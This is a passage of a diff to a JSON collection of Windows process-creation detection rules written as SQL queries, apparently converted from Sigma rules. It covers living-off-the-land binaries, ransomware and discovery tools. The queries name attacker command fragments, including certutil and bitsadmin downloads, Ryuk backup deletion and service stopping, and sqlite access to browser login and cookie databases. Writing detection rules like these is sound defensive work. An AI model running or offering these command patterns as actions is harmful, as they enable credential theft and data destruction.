'%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", - "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Execute C# code located in the consoleapp folder", - "author": "Beyu Denis, oscd.community", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", - "author": "frack113", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "status": "test", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Local Groups Reconnaissance Via Wmic.EXE", - "id": "164eda96-11b2-430b-85ff-6a265c15bf32", - "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Scheduled Task Creation", + "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "status": "test", + "description": "Detects the creation of scheduled tasks in user session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_group.yml" + "filename": "proc_creation_win_schtasks_creation.yml" }, { - "title": "Suspicious Reg Add Open Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", - "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use by a software developer." + "Other programs that use these command line option and accepts an 'All' parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Curl.EXE Execution", - "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_execution.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "status": "test", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", + "author": "frack113", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Suspicious Tasklist Discovery Command", - "id": "63332011-f057-496c-ad8d-d2b6afb27f96", - "status": "test", - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Using 